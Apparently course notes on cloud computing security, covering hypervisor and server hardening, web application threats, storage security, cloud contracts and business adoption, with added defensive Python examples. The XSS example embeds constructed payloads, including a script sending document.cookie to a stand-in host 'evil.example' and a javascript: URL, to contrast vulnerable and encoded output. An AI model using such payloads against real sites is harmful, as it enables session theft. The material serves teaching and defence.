A hypervisor, also called a virtual machine monitor (VMM), is the controller that allows multiple operating systems to run on a single machine at the same time. With many operating systems running on one hardware platform, security issues increase, because it is difficult to monitor multiple operating systems on a single hardware unit. For example, a guest system may try to run malicious code on the host, take control of it, block other guest OSes or even make changes to another guest OS. An advanced cloud protection system can be developed to monitor the guest VMs and the communication among the various infrastructure components. The virtualisation platform is software (major vendors are VMware, Xen and Microsoft), and it is important to secure this layer that sits between the hardware and the virtual servers. Because the isolation of customer VMs from each other in a multi-tenant environment depends on it, protecting the hypervisor from unauthorised users is critical. To protect the hypervisor, the IaaS customer should understand the technology and the security process controls instituted by the CSP.

· Virtual server Security

Customers of IaaS have full access to the virtualized guest VMs, which are hosted and isolated from each other by hypervisor technology. Virtual servers may be reachable from the Internet, so sufficient network access restrictions should be in place to limit access to the virtual instances. The IaaS platform also creates a risk through self-provisioning: anyone who can create a new virtual server can create an insecure one. Securing virtual servers in the cloud therefore requires strong operational security procedures:

• Protect the integrity of the image from unauthorized users.

• Safeguard the private keys required to access hosts in the public cloud.

• Keep the decryption keys away from the cloud; do not bake credentials into the image.

• Do not allow password-based authentication for shell access.

• Require passwords for sudo or role-based access (no direct root login).

• Run a host firewall and open only the minimum ports necessary to support the services on an instance.

• Run only the required services and turn off the unused services.

• Enable system auditing and event logging.

• Send the log events to a dedicated log server.

• Keep the log server separate, with higher security protection including access controls.
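As an added example, not part of the original notes, the following Python script audits a freshly provisioned instance against three of the checklist items above: password-based shell access, direct root login over SSH, and services listening on ports that were never meant to be exposed. The sshd_config text and the socket listing are constructed samples embedded in the script; on a real host you would feed it /etc/ssh/sshd_config and the output of `ss -tlnH`, and the allowed-port set is an assumption chosen for the example.

```python
"""Audit a virtual server against the hardening checklist (added example)."""
from typing import Dict, List, Set

# Constructed sample sshd_config (not taken from a real host)
SAMPLE_SSHD_CONFIG = """
# sshd_config of a freshly self-provisioned instance
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
"""

# Constructed sample in the shape `ss -tlnH` prints: state recv-q send-q local peer
SAMPLE_LISTENING = """
LISTEN 0 128 0.0.0.0:22   0.0.0.0:*
LISTEN 0 128 0.0.0.0:80   0.0.0.0:*
LISTEN 0 128 0.0.0.0:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:25 0.0.0.0:*
"""

# Directive -> value the checklist requires
REQUIRED_SSHD = {
    "PasswordAuthentication": "no",   # no password-based shell access
    "PermitRootLogin": "no",          # log in as a user, then sudo / role-based access
    "PubkeyAuthentication": "yes",    # key-based login only
}


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return effective directives (lower-cased); sshd honours the first occurrence."""
    directives: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            directives.setdefault(parts[0].lower(), parts[1].strip().lower())
    return directives


def audit_sshd(text: str) -> List[str]:
    """List every required directive that is missing or set to the wrong value."""
    found = parse_sshd_config(text)
    findings = []
    for directive, expected in REQUIRED_SSHD.items():
        actual = found.get(directive.lower())
        if actual is None:
            findings.append(f"{directive} not set explicitly (default may be permissive)")
        elif actual != expected:
            findings.append(f"{directive} is '{actual}', expected '{expected}'")
    return findings


def audit_listening(text: str, allowed_ports: Set[int]) -> List[str]:
    """Flag sockets bound on a non-loopback address whose port is not allow-listed."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")
        if host in ("127.0.0.1", "[::1]"):
            continue                              # loopback-only: not externally reachable
        if int(port) not in allowed_ports:
            findings.append(f"port {port} listening on {host} is not in the allow-list")
    return findings


if __name__ == "__main__":
    for finding in audit_sshd(SAMPLE_SSHD_CONFIG) + audit_listening(SAMPLE_LISTENING, {22, 80}):
        print("FINDING:", finding)
```

Run against the constructed input it reports the two sshd directives that permit password and root login and the MySQL port exposed on all interfaces, while the loopback-only SMTP listener is ignored. Directives that are simply absent are reported too, because an unset directive falls back to the daemon default, which for PasswordAuthentication is "yes".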


6.3 Application level security threats:-

Many companies host applications on the Internet that users consume without considering where, how or by whom the services are provided, so proper security mechanisms must be adopted. The types of application level security threats are:

· SQL Injection attack

The attacker inserts malicious SQL into input that the application concatenates into a standard SQL statement. This allows an unauthorized person to read or download the entire database, or to interact with it in other illicit ways, and so to reach sensitive data. The attack is avoided by never building SQL text dynamically from user input: bind values with parameterized (prepared) statements and validate input on the server.

· Cross-site scripting [XSS]

The attacker embeds script in a URL or in content stored by a dynamic website; when a user clicks the link or views the page, the JavaScript executes in the user's browser within the site's origin. On dynamic websites a pop-up window may ask the user to click a link; once the user does, the attacker's script can read session cookies and other private information. The defence is to encode all untrusted data on output for the context it lands in (HTML text, attribute, JavaScript or URL) and to mark session cookies HttpOnly so script cannot read them.
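As an added example (not from the original notes), this Python snippet renders a user comment into HTML twice: once by plain string interpolation, which is the XSS bug, and once with context-specific encoding, which also refuses `javascript:` links in the profile URL. The author, body and URL values are constructed attack inputs.

```python
"""Context-aware output encoding against XSS (added example)."""
import html
from urllib.parse import quote


def render_comment_vulnerable(author: str, body: str, profile_url: str) -> str:
    """Interpolates untrusted values straight into HTML: the XSS bug."""
    return (f'<div class="comment"><a href="{profile_url}" title="{author}">'
            f'{author}</a>: {body}</div>')


def safe_url(url: str) -> str:
    """Allow only http(s) links (blocks javascript: and data: URLs), then percent-encode."""
    if not url.lower().startswith(("http://", "https://")):
        return "#"
    return quote(url, safe=":/?=&#%")


def render_comment(author: str, body: str, profile_url: str) -> str:
    """Encode each value for the context it is placed in."""
    attr_author = html.escape(author, quote=True)   # attribute context: quotes escaped too
    text_body = html.escape(body)                    # element text context: < > & escaped
    href = html.escape(safe_url(profile_url), quote=True)
    return (f'<div class="comment"><a href="{href}" title="{attr_author}">'
            f'{attr_author}</a>: {text_body}</div>')


# Constructed attack inputs
EVIL_BODY = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
EVIL_AUTHOR = '" onmouseover="alert(1)'
EVIL_URL = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    print(render_comment_vulnerable(EVIL_AUTHOR, EVIL_BODY, EVIL_URL))
    print(render_comment(EVIL_AUTHOR, EVIL_BODY, EVIL_URL))
```

The vulnerable output contains a live `<script>` element, an injected `onmouseover` handler and a `javascript:` link; the encoded output contains none of them, and a legitimate URL with a query string survives with its `&` written as `&amp;`, which is the correct form inside an attribute.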

· EDoS

An attack against the billing model that underlies the cost of providing a service, with the goal of bankrupting the service itself. DoS attacks on pay-as-you-go cloud applications result in a dramatic increase in the cloud utility bill through increased consumption of network bandwidth, CPU and storage. This type of attack is characterized as economic denial of sustainability (EDoS); budget alerts and hard spending caps are the usual safeguards.

· Cookie Poisoning

Cookies are used to store user IDs and session identifiers. There are two types: persistent and non-persistent. A persistent cookie is stored on the client hard drive, so an attacker who can access the client machine can easily read it. A non-persistent (session) cookie is stored only in memory and is harder to access. In a cookie poisoning attack an unauthorized person modifies the content of a cookie in order to access the application or web page; because cookies carry identity credentials, anyone who obtains or forges them can pose as an authorized user. This is countered by signing (or encrypting) cookies on the server so that tampering is detected, by setting the Secure and HttpOnly flags, and by regular cookie cleanup.

· Backdoor and debug options

Developers sometimes leave debugging options enabled when publishing a web site. An attacker can use the debug interface, or a forgotten backdoor account, to get into the site and make changes. To prevent this, the developer should disable debugging options and remove backdoor accounts before deployment.

· Hidden field manipulation

Some fields on a web page are hidden from the user and used only by the developer. Hidden fields in HTML forms convey important information such as price or user ID. An attacker can save the catalogue page, change the value of a hidden field and post the modified form back to the server; if the server trusts the value this is a severe security violation. The server must never trust hidden fields: look the value up server-side, or protect it with a signature that the server verifies.
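The following Python example is added here and is not from the original notes; it serves both the cookie poisoning and the hidden field manipulation passages above, since the defence is the same. The server signs the cookie (or hidden field) with an HMAC over its contents and rejects anything whose tag no longer matches. The server key is a constructed placeholder; in production it comes from a secret store, and the `tamper` function only shows what the attacker does to the value.

```python
"""HMAC-signed cookies and hidden form fields so tampering is detected (added example)."""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Assumption: in production this comes from a secret store, never from source code
SERVER_KEY = b"constructed-demo-key-32-bytes-long!!"


def _encode(payload: dict) -> str:
    raw = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode()


def sign(payload: dict, key: bytes = SERVER_KEY) -> str:
    """Serialize the payload and append an HMAC-SHA256 tag: '<base64>.<hex tag>'."""
    body = _encode(payload)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify(token: str, key: bytes = SERVER_KEY) -> Optional[dict]:
    """Return the payload if the tag matches, else None (constant-time comparison)."""
    body, sep, tag = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except ValueError:
        return None


def tamper(token: str, field: str, new_value) -> str:
    """What the attacker does: edit one field in the cookie or hidden field, keep the old tag."""
    body, _, tag = token.rpartition(".")
    payload = json.loads(base64.urlsafe_b64decode(body))
    payload[field] = new_value
    return f"{_encode(payload)}.{tag}"


if __name__ == "__main__":
    session = sign({"uid": 42, "role": "user"})          # Set-Cookie value
    order = sign({"sku": "CAM-1", "price": 999})          # hidden form field value
    print("valid session  :", verify(session))
    print("role -> admin  :", verify(tamper(session, "role", "admin")))
    print("price -> 1     :", verify(tamper(order, "price", 1)))
```

A poisoned cookie claiming `role=admin` and a hidden field rewritten to `price=1` both verify as `None`, so the server never acts on them. Signing proves integrity only; if the contents must also stay secret from the client, encrypt the payload before signing it.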

· Google Hacking

The Google search engine is a convenient tool for an attacker looking for sensitive information, and it can even lead to the compromise of user accounts. Attackers generally use crafted searches to find security loopholes in the systems they wish to hack and to gather the necessary information about the target before attacking it. In one widely reported incident, a group of hackers in China obtained the login details of various Gmail users. Such threats are launched at the application level and can cause system downtime, disabling application access even for authorized users.

· Man in the middle attack

This attack is a form of eavesdropping. The attacker inserts himself into the connection between two users and either listens to the conversation or feeds false information to each side. Tools such as Dsniff, Cain, Ettercap, Wsniff and Airjack are used to carry out such attacks; the defence is to authenticate both ends of the connection and encrypt the channel, for example with TLS and proper certificate validation, so that an interposed attacker cannot read or alter the traffic without being detected.
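As an added example that is not part of the original notes, the Python code below plays out a man-in-the-middle against an unauthenticated Diffie-Hellman key exchange and then the same exchange with each public value authenticated by an HMAC under a pre-shared key. The group parameters are a deliberately small toy group and the pre-shared key is a constructed value; both are assumptions for the demonstration, and a real deployment would use a standardised 2048-bit or larger group and certificates or a provisioned key.

```python
"""Man-in-the-middle on unauthenticated Diffie-Hellman, and the authenticated fix (added example)."""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Toy group for illustration only; real deployments use a standardised 2048-bit+ group
P = 2 ** 61 - 1      # Mersenne prime
G = 2
PSK = b"constructed pre-shared key"   # assumption: provisioned out of band to Alice and Bob


def dh_keypair() -> Tuple[int, int]:
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def dh_shared(priv: int, other_pub: int) -> str:
    """Session key = H(g^(ab) mod p)."""
    return hashlib.sha256(str(pow(other_pub, priv, P)).encode()).hexdigest()


def unauthenticated_exchange() -> Tuple[str, str, str, str]:
    """Alice -> 'A = g^a', Bob -> 'B = g^b'; Mallory swaps both for her own M."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    m_priv, m_pub = dh_keypair()
    alice_key = dh_shared(a_priv, m_pub)          # Alice received M, believes it is B
    bob_key = dh_shared(b_priv, m_pub)            # Bob received M, believes it is A
    mallory_alice = dh_shared(m_priv, a_pub)      # Mallory shares a key with each side
    mallory_bob = dh_shared(m_priv, b_pub)
    return alice_key, bob_key, mallory_alice, mallory_bob


def auth_tag(pub: int, sender: bytes, key: bytes = PSK) -> str:
    """Binds the public value to its sender; cannot be forged without the PSK."""
    return hmac.new(key, sender + b"|" + str(pub).encode(), hashlib.sha256).hexdigest()


def authenticated_exchange(mitm: bool) -> Optional[Tuple[str, str]]:
    """Returns (alice_key, bob_key) on success, None if either side rejects the message."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    msg_from_alice = (a_pub, auth_tag(a_pub, b"alice"))   # Alice -> Bob
    msg_from_bob = (b_pub, auth_tag(b_pub, b"bob"))       # Bob -> Alice
    if mitm:
        _, m_pub = dh_keypair()
        # Mallory can replace the values but has to reuse the tags she observed
        msg_from_alice = (m_pub, msg_from_alice[1])
        msg_from_bob = (m_pub, msg_from_bob[1])
    pub, tag = msg_from_alice                               # Bob verifies before using
    if not hmac.compare_digest(tag, auth_tag(pub, b"alice")):
        return None
    bob_key = dh_shared(b_priv, pub)
    pub, tag = msg_from_bob                                 # Alice verifies before using
    if not hmac.compare_digest(tag, auth_tag(pub, b"bob")):
        return None
    alice_key = dh_shared(a_priv, pub)
    return alice_key, bob_key


if __name__ == "__main__":
    a, b, ma, mb = unauthenticated_exchange()
    print("Alice and Bob agree?", a == b, "| Mallory shares Alice's key?", a == ma)
    print("authenticated, no MITM:", authenticated_exchange(mitm=False) is not None)
    print("authenticated, MITM   :", authenticated_exchange(mitm=True))
```

In the unauthenticated run Alice and Bob end up with different keys, each of which Mallory also holds, so she can decrypt and re-encrypt everything in between. In the authenticated run the substituted value fails the tag check and the handshake is aborted, which is the role certificates play in TLS.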

· Dos Attack

In a DoS attack the services assigned to authorized users become unusable by them. The attacker sends a large number of service requests that exceed what the server can handle, so the service becomes unavailable to authorized users. A DoS attack increases bandwidth consumption and causes congestion by overloading the server with requests, making certain parts of the cloud inaccessible to users. An intrusion detection system (IDS) is the most popular method of defence against this type of attack.

· Distributed Denial of services

DDoS is the advanced version of DoS: the services running on a server are denied because the server cannot handle the combined load. A DDoS attack has three functional units: a master, the slaves and a victim. The master is the attack launcher behind the whole operation; the slaves are a network of compromised machines that act as a launch pad for the master and provide the platform from which the victim is attacked. Hence it is also called a coordinated attack. The attack operates in two stages: an intrusion phase, in which the master compromises many less important machines so that they can help flood the more important one, and an attack phase, in which DDoS tools are installed on the compromised machines and used against the victim server. As in a DoS attack the services become unavailable to authorized users; only the way the attack is launched differs. In a well-known DDoS attack the CNN news website was inaccessible for a period of about three hours.
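The Python example below is added here and is not from the original notes; it illustrates the rate-based detection an IDS applies to the DoS and DDoS traffic described in this section and in the network level section earlier. It builds a constructed access log (Common Log Format lines, not captured traffic) containing an ordinary client, one flooding source and a burst from forty hosts, then slides a ten-second window over it. A single source over the per-source limit is a DoS source; a window whose total exceeds the global limit while coming from many distinct sources is treated as distributed. The thresholds are assumptions for the example.

```python
"""Rate-based DoS/DDoS detection over access-log lines (added example)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Deque, Dict, List, Tuple

LOG_TS = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip: str, ts: datetime) -> str:
    """Build one Common Log Format line (constructed, not captured traffic)."""
    return f'{ip} - - [{ts.strftime(LOG_TS)}] "GET / HTTP/1.1" 200 512'


def build_sample_log() -> List[str]:
    """An ordinary client, one single-source flood (DoS) and a 40-host burst (DDoS)."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    lines = [_line("192.0.2.10", base + timedelta(seconds=s)) for s in (0, 5, 9)]
    lines += [_line("203.0.113.5", base + timedelta(seconds=i // 6)) for i in range(60)]
    burst = base + timedelta(minutes=15)
    for host in range(1, 41):
        lines += [_line(f"198.51.100.{host}", burst + timedelta(seconds=s)) for s in (0, 4, 8)]
    return lines


def parse_line(line: str) -> Tuple[str, datetime]:
    """Extract the client address and timestamp from a CLF line."""
    ip, rest = line.split(" ", 1)
    stamp = rest[rest.index("[") + 1:rest.index("]")]
    return ip, datetime.strptime(stamp, LOG_TS)


def detect(lines: List[str], window: int = 10, per_source_limit: int = 30,
           global_limit: int = 100, min_sources: int = 20) -> Dict[str, object]:
    """Slide a `window`-second window over the log, ordered by time.

    A source with more than `per_source_limit` requests in a window is a DoS source;
    more than `global_limit` requests from at least `min_sources` distinct sources in
    one window is treated as a distributed attack (no single source stands out)."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e[1])
    per_source: Dict[str, Deque[datetime]] = defaultdict(deque)
    recent: Deque[Tuple[str, datetime]] = deque()
    dos_sources, ddos = set(), False
    for ip, ts in events:
        q = per_source[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) > per_source_limit:
            dos_sources.add(ip)
        recent.append((ip, ts))
        while (ts - recent[0][1]).total_seconds() > window:
            recent.popleft()
        if len(recent) > global_limit and len({src for src, _ in recent}) >= min_sources:
            ddos = True
    return {"dos_sources": sorted(dos_sources), "ddos_detected": ddos}


if __name__ == "__main__":
    print(detect(build_sample_log()))
```

On the constructed log the flooding host is reported by the per-source rule, while the forty-host burst trips only the aggregate rule: each of its hosts sends three requests, which is why per-source limits alone do not catch a DDoS and why the response (upstream scrubbing, anycast, rate limiting at the provider edge) has to live outside the single server.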

Other Security Threats:

· Failures in Providers Security

Security must be designed into the cloud, because the cloud service provider controls the hardware and the hypervisor on which customer data is stored and on which customer applications run; a failure in the provider's security is therefore a failure in the customer's security as well.

· Attacks by other Customer

The cloud service provider's resources are shared with untrusted parties, so one customer may be able to access another customer's sensitive information; this is a real possibility in a multitenant cloud. To counter it, strong cryptography and application-layer isolation should be applied.

· Availability and reliability issues

Cloud services are accessed through the Internet, so Internet availability and reliability are essential. Because the service path crosses the Internet, complexity and the chance of failure increase. The countermeasure is to monitor availability carefully.

· Legal and Regulatory Issues

Cloud computing raises many legal and regulatory issues when data is exposed outside its home jurisdiction.

· Perimeter security model broken

Many organizations use a perimeter security model with strong security at the edge of the enterprise network. With the cloud, critical data and applications are stored outside that perimeter and outside enterprise control, so the perimeter model no longer protects them.

· Integrated Provider and customer Security

The problem is that provider and customer security systems are disconnected: misbehaviour in the cloud may never be reported to the customer. The cloud service provider should adopt properly integrated identity management and incident reporting.

INFRASTRUCTURE SECURITY: THE NETWORK LEVEL

As far as network-level infrastructure security is concerned, it is important to distinguish between public clouds and private clouds. With private clouds there are no new attacks, vulnerabilities or changes in risk specific to this topology that information security personnel need to consider. If public cloud services are chosen, changing security requirements will require changes to the network topology, and the way the existing network topology interacts with the cloud provider's network topology must be taken into account.

There are four significant risk factors in this use case:

1. Ensuring the confidentiality and integrity of organization's data-in-transit to and from a public cloud provider.

2. Ensuring proper access control

3. Ensuring the availability of the Internet-facing resources

4. Replacing the established model of network zones and tiers with domains.

INFRASTRUCTURE SECURITY - THE HOST LEVEL

When reviewing host security and assessing risks, the context of the cloud service delivery model (SaaS, PaaS and IaaS) and deployment model (public, private and hybrid) should be considered. In SaaS and PaaS the host security responsibilities are transferred to the cloud service provider. IaaS customers are primarily responsible for securing the hosts they provision in the cloud (virtualization software security, and the security of the customer's guest OS or virtual server).

INFRASTRUCTURE SECURITY: THE APPLICATION LEVEL

Software or application security should be a crucial element of a security program, yet most enterprises with information security programs have not introduced an application security program to address this domain. Designing and implementing applications aimed at deployment on a cloud platform will require existing application security programs to re-examine current practices and standards. The application security spectrum ranges from single-user applications to multiuser e-commerce applications. This level is responsible for managing:

· Application-level security threats;

· End user security;

· SaaS application security;

· PaaS application security;

· Customer-deployed application security

· IaaS application security

· Public cloud security limitation

7. Data security and storage:

A DEFINITION OF CLOUD STORAGE SECURITY

While cloud storage is convenient and gives employees access to their data anywhere, at any time, on nearly any device, cloud storage security is a top concern for organizations' IT and security departments. The benefits brought by cloud storage, from scalability and accessibility to decreased IT overhead, are driving rapid adoption at enterprises around the world, and there are steps that companies should take to improve cloud storage security and keep sensitive data safe in the cloud.

THE NEED FOR CLOUD STORAGE SECURITY

Businesses and enterprises use cloud services because they provide cost-effective and flexible alternatives to expensive, locally-implemented hardware. But conducting business in the cloud means that confidential files and sensitive data are exposed to new risks, as cloud-stored data resides outside of the limits of many safeguards used to protect sensitive data held on-premise. As such, enterprises must take additional measures to secure cloud storage beyond the sometimes basic protections offered by providers.

The rise of Internet of Things (IoT) technology and the connected office has also made enterprises more reliant on cloud technology, albeit while driving security risks. Even smart printers have been found vulnerable to data leakage, and as more corporate devices become internet-connected, the potential for compromise or unintended leakage increases.

CLOUD STORAGE SECURITY BASICS

As enterprises move further along the cloud adoption curve, cloud storage security is becoming a top priority, both in enterprises' IT architecture and in their information security strategies. Companies now recognize that it is critical to protect sensitive data while enabling employees to enjoy the performance and flexibility of the cloud.

Cloud storage providers and enterprises share responsibility for cloud storage security. Cloud storage providers implement baseline protections for their platforms and the data they process, such as authentication, access control and encryption. From there, most enterprises supplement these protections with added security measures of their own to bolster cloud data protection and tighten access to sensitive information in the cloud.

CLOUD STORAGE SECURITY CHALLENGES

One of the biggest challenges with cloud storage security is that employees use free file sharing and cloud storage services that are not approved by the organization and may not meet minimum security standards. Knowingly or not, employees can put company data at risk by using these services, particularly without the IT department's knowledge or approval.

In addition to implementing security solutions to protect sensitive data against unauthorized access or egress and to enforce cloud security policies, it is critical that organizations educate their employees on the risks posed by sharing and storing information in the cloud. Additionally, organizations must take the appropriate security measures to mitigate cloud storage security risks introduced by employees who may inadvertently use services and applications that do not meet the company's security standards.

There are complex data security challenges in the cloud:

· The need to protect confidential business, government or regulatory data

· Cloud service models with multiple tenants sharing the same infrastructure

· Data mobility and legal issues relative to government rules such as the EU Data Privacy Directive

· Lack of standards about how cloud service providers securely recycle disk space and erase existing data

· Auditing, reporting and compliance concerns

· Loss of visibility into key security and operational intelligence that is no longer available to feed enterprise IT security intelligence and risk management

· A new type of insider who does not even work for your company, but may have control over and visibility into your data

CLOUD STORAGE SECURITY SOLUTIONS

Data protection solutions for cloud storage security provide complete visibility and policy-based control over how data can be moved to and from the cloud, ensuring that only authorized data leaves the company’s environment and that data access is limited to authorized parties. In doing so, companies can enforce stricter protections around sensitive data than what many cloud storage providers offer and provide a second line of defense in the event that a provider has a security compromise.

When choosing a cloud storage security solution, enterprises should be sure that it:

· provides continuous monitoring and visibility for all data interactions with cloud storage applications;

· provides granular control over file movement based on browser and OS events involving file sharing and cloud storage sites;

· integrates with leading cloud storage providers so that data protection measures extend to data stored in the cloud;

· automatically encrypts sensitive data prior to egress;

· accurately classifies any data downloaded from web applications; and

· delivers forensic event logs for effective alerting, reporting and policy creation.

8. Five key legal considerations when negotiating cloud contracts

Cloud contracts 1: Understand provider’s terms

Cloud computing services are generally implemented on the provider’s terms - although it can often be a struggle to figure out exactly what those terms are.

Watch out for some cloud providers’ complex, multi-document contract structures that may be poorly updated and oddly worded. In particular, don’t assume that you know what’s in a provision based on its heading. For example, in some terms, ‘force majeure’ seems to be elastic-sided enough to capture “changes in the taxation basis of services delivered via the Internet” as a force majeure event!

Understandably, contracts for private cloud solutions and with system integrators/resellers allow more scope for negotiation than contracts with public cloud providers. However, even in public cloud deals, terms are increasingly negotiable - although the degree of negotiability certainly pales in comparison with traditional outsourcing contracts.

Some of the key issues that tend to recur in cloud contract negotiations include:

• customer control and visibility over subcontracting, with a general reluctance from providers to allow approval over, or even to identify, subcontractors;

• limitations on the provider's ability to change the nature of the services (here it is generally advisable for customers to focus on the commercial implications of such changes, rather than the right itself);

• privacy and data security commitments;

• rights of the provider to suspend services, e.g., for non-payment or violation of an acceptable use policy;

• limitations of liability; and

• exit provisions allowing the customer to extend service for a period after termination or expiry to allow migration to the replacement solution.

Technical areas don't tend to lend themselves to negotiation given the commoditised nature of cloud solutions, and you can show your naivety by asking for changes that directly contradict the services model.

Cloud contracts: 2. Due diligence

Because of the constraints on your ability to negotiate the provider’s cloud terms, it’s essential to carry out appropriate due diligence on the provider. Areas of focus should include:

· Location of services

· Service performance and usability

· Existing customers (references)

· Data location, processing, portability and recovery

· Security

· Interoperability

· Business continuity

· Exit

Cloud contracts: 3 - Data privacy remains centre stage

It’s also vital to understand how responsibility for data privacy obligations will be allocated between you and the provider, including who is responsible for data security.

Typically, providers have been more willing to take on responsibility for network integrity, while trying to steer clear of obligations in relation to security of the data itself.

However, over recent years, cloud service providers have been improving their privacy offerings. For example, there has been an increased willingness of providers to adopt the EU model clauses for data transfer.

In addition, many providers now offer European-based data centres, reacting to commercial pressures from Europe-based clients.

When evaluating cloud solutions:

• classify the data concerned (including its sensitivity), and consider what would happen if data was disclosed, lost or corrupted;

• consider what the business impact would be if you were unable to use the data;

• check whether the provider is compliant with ISO/IEC 27001/2 and, if a public cloud provider, ISO/IEC 27018; and

• ensure that your deployment of cloud will comply with applicable data protection law, taking into account all relevant regulatory guidance, e.g., the EU Data Protection Working Party 29's opinion on cloud, the EU Cloud Standardisation Guidelines and the ICO's guidance on cloud computing.

Cloud contracts: 4 - Performance commitments are hard to find

Ensure that you are comfortable with the level of service performance commitment offered by the cloud provider.

Most cloud contracts remain pretty light in terms of service levels, with availability being the typical measurement metric. Check the wording of the SLAs carefully – watch out for references to ‘service levels designed to be available’, ‘target service levels’, etc.

Also, identify the remedies available for service failure – it’s common for providers to offer credit for additional services, despite the fact that it’s hard to see ‘more of the same’ as a valuable remedy.

Cloud contracts: 5 - Regulators are taking notice

If you are a regulated entity, you will need to take account of relevant regulatory guidance. For example, the FCA published draft guidance on cloud computing in November 2015 (due to be published in final form this year). This high level guidance is aimed at ensuring regulated firms appropriately identify and manage risks relating to the deployment of cloud-based solutions. Issues identified in the guidance include:

• legal and regulatory considerations

• risk management

• oversight and audit

• data privacy and security

• change management

• business continuity

• exit

Cloud contracts: Conclusion

Ultimately, you need to approach cloud transactions with a heavy dose of pragmatism, accepting that it may be very difficult to negotiate material changes to a cloud provider’s terms.

You need to carry out a thorough risk/benefit analysis exercise in order to evaluate whether the particular cloud solution is right for your business. If you perceive the risks to be so great that significant contract negotiation seems essential before putting services in the cloud, it may be that cloud isn’t the right solution for you after all.

9. Commercial and Business consideration in cloud computing

Cloud computing technology has improved significantly in the past year, making it an appealing tool for businesses of all sizes. Cloud computing can benefit businesses in many ways, from cutting costs, to increasing business efficiency, to providing data recovery in case of an accident. In fact, 47 percent of medium and large enterprises say increased efficiency is the main benefit of cloud computing, according to new survey data on enterprise cloud computing.

What common mistakes should companies be aware of as they begin the migration process? What steps should they take when implementing cloud infrastructure? Moving to the Cloud can be complicated. Not all data, applications, and files are suited for cloud storage and security issues may arise if proper safeguards are not implemented properly.

Some common cloud implementation mistakes include,

· Solely relying on in-house resources

· Selecting a cloud service provider that does not meet your company's needs

· Starting off with a complex cloud solution before acquiring the necessary knowledge and resources to maintain and secure the system properly

Three crucial considerations will help businesses navigate these mistakes as they prepare to adopt cloud infrastructure.

1. DETERMINE BUSINESS’ CLOUD COMPUTING NEEDS AND GOALS

Before adopting a new technology, the crucial question to ask is, “How can it meet the company’s needs?”

These considerations require evaluating the following:

· Type and breadth of data a company needs to store

· Tasks they need to accomplish

· Level of security and privacy they need to maintain

· Standards and regulations to which they need to be compliant

· Features they need to ensure quality performance and enhanced business function.

For example, if a company is choosing between the big four cloud providers – Amazon Web Services (AWS), Microsoft Azure, Google Cloud, and IBM Cloud – AWS may stand out because of its reputation as the cloud computing service that dominates the market. However, if the company already uses Microsoft applications, Azure may be the better choice.

“The most popular cloud vendor is Amazon. They are ahead of the game because they offer services that are easy to implement and use. Then, Microsoft Azure and Google follow Amazon. … But, if a company or enterprise is attached to Microsoft products, then Microsoft Azure may be a better fit for them. It depends on the company’s requirements.” – Jose Alvarez, director of IT infrastructure, Auxis

2. CHOOSE A CLOUD SOLUTION THAT MEETS YOUR COMPANY’S NEEDS

The three cloud systems, public, private, and hybrid, have advantages and disadvantages. Before adopting cloud infrastructure, it is important for businesses to understand the similarities and differences of each cloud solution in order to select the type that is most appropriate for their business goals.

First, the public cloud provides resources publicly over the Internet. While data scalability and price flexibility are key advantages of this cloud solution, a business that does not know how to monitor data security risks a security breach.

Second, private cloud solutions service a single company and are managed in-house by the IT department. The main advantage of the private cloud is the high level of security it offers. Businesses are responsible for the infrastructure. However, maintaining a private cloud solution is more expensive and less flexible than the public cloud.

Third, hybrid cloud solutions combine characteristics from both public and private clouds. However, a business needs a knowledgeable IT staff on-hand to combat the complexities inherent in this solution.

3. EVALUATE KNOWLEDGE AND RESOURCE GAPS IN IT DEPARTMENT

Especially in the SMB market, cloud infrastructure adoption often slows due to a fear of the Cloud. One explanation for this fear is the lack of knowledge and resources available in-house to implement and maintain cloud solutions, according to David Amaya, a consultant at Cardinal Solutions.

“Many [businesses] know just enough about the Cloud to be afraid of it and say, ‘I’m not touching that.’” – David Amaya

Another explanation highlights ever-present security and compliance concerns.

“I see the challenge of cloud security as an educational issue. People have to understand and learn more about the Cloud to use it effectively.” – Randy Bias, vice president of technology at EMC

To ensure your IT department can confront this fear of the cloud head on, it is necessary to consider the following questions:

· Does the company have a dedicated IT team in-house?

· What roles will the IT team play after cloud infrastructure implementation?

· What additional resources and training are needed to prepare the IT team for the transition?

TAKEAWAYS

Cloud computing opens up numerous opportunities for businesses, and the complexities inherent in adopting cloud infrastructure should not dissuade businesses from embracing this technology. Outlining business needs and goals, comparing these needs to the cloud solutions and services available, and determining the resources required to facilitate the transition are key to a successful and effective cloud implementation process.

10. Authentication in cloud computing:

Authentication

Authentication is the process by which a user provides proof of identity. It is most often done through a login based on a username and a password. This static mechanism leaves the system vulnerable, since attackers can use many techniques, such as sniffing and guessing, to steal user passwords. To alleviate the problems associated with identity theft, it is essential to adopt stronger forms of authentication.

